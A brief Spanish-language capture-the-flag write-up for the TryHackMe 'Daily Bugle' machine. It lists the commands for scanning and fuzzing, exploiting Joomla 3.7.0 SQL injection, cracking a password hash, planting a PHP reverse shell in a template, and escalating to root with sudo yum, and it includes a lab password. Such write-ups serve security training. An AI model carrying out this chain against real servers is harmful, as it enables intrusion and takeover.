TryHackMe Hard Linux Joomla SQLi PHP sudo yum

Daily Bugle

Joomla 3.7.0 SQLi via joomblah.py; hash crackeable con john; reverse shell via template; escalada con sudo yum.

cat4clysm
Herramientas utilizadas
nmap wfuzz joomblah.py john netcat

Scanning

root@kali:~$
nmap -sC -sV -p 22,80,3306 10.10.116.241 -oN targeted

Joomla 3.7.0 - SQLi

root@kali:~$
wfuzz -c --hc 404,403 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.116.241/FUZZ -t 200
wfuzz

Version Joomla: http://10.10.116.241/administrator/manifests/files/joomla.xml

joomla version
root@kali:~$
python2 joomblah.py http://10.10.116.241/
joomblah

Hash obtenido: $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm

root@kali:~$
john --wordlist=/usr/share/wordlists/rockyou.txt hash
john hash --show
john cracked

Reverse Shell via Template Editor

Entramos al admin y vamos a Extensions > Templates > Templates. Editamos error.php con reverse shell PHP:

root@kali:~$
cp /usr/share/laudanum/wordpress/templates/php-reverse-shell.php .

Accedemos a http://10.10.116.241/templates/beez3/error.php con nc escuchando.

template editor shell

Escalada - yum sudo

En /var/www/html/configuration.php encontramos la clave nv5uz9r3ZEDzVjNu.

config.php

El usuario jjameson usa esta contrasena. Con sudo yum escalamos:

sudo -l gtfobins yum root

Lecciones aprendidas